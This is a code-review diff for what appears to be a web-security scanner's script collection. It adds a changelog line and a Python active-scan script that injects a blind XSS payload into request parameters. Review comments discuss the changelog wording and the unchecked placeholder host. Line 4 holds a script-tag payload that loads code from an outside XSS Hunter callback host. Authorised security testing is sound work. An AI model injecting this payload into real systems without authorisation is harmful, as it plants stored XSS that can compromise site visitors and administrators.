2 files changed +19 -0 lines changed
lines changed Original file line number Diff line number Diff line change @@ -8,6 +8,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
88- variant/CompoundCookies.js - An input vector script that handles splitting of compound cookies (Issue 6582).
99- active/corsair.py > An active scan script to check for CORS related issues.)
1010- payloadgenerator/securerandom.js > A fuzzer payload generator script that uses Java's SecureRandom as it's source (related to issue 6892).
11+ - active/bxss.py > an active scan script for inject blind xss payloads to the parameters
1112
1213## [ 13] - 2021-10-14
1314### Fixed
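Review bot: The added changelog entry for active/bxss.py does not match the entries around it: it starts with a lowercase "an", reads "for inject blind xss payloads to the parameters", and has no closing period. Suggest "- active/bxss.py > An active scan script that injects blind XSS payloads into parameters." The neighbouring entries also mix " - " and " > " as the separator after the file name, so it is worth settling on one of them while this line is being touched.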
Original file line number Diff line number Diff line change 1+ # by: Khaled Nassar @knassar702
2+
3+ # YOUR XSSHUNTER PAYLOAD
4+ bxss = '"><script src="//yourusername.xss.ht"></script>'
5+ def scanNode (sas , msg ):
6+ pass
7+
8+
9+ def scan (sas , msg , param , value ):
10+
11+ # Copy requests before reusing them
12+ msg = msg .cloneRequest ();
13+
14+ # setParam (message, parameterName, newValue)
15+ sas .setParam (msg , param , bxss );
16+
17+ # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
18+ sas .sendAndReceive (msg , False , False );
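Review bot: The payload on line 4 ships with the placeholder host "yourusername.xss.ht" and nothing in scan() checks that it was changed, so a user who enables the script as committed plants a script tag pointing at a host they do not control in every scanned parameter. Suggest moving the callback host into a clearly named variable at the top of the file and returning early from scan() while it still holds the placeholder value. The file also has no header comment saying what the script does, and because scan() discards the response and never raises an alert, it should state that findings only appear out-of-band at the callback service and not in the scan results. Minor style points: the trailing semicolons on lines 12, 15 and 18 are not needed in Python, and the empty scanNode on lines 5 and 6 could carry a one-line comment saying that node-level scanning is intentionally unused.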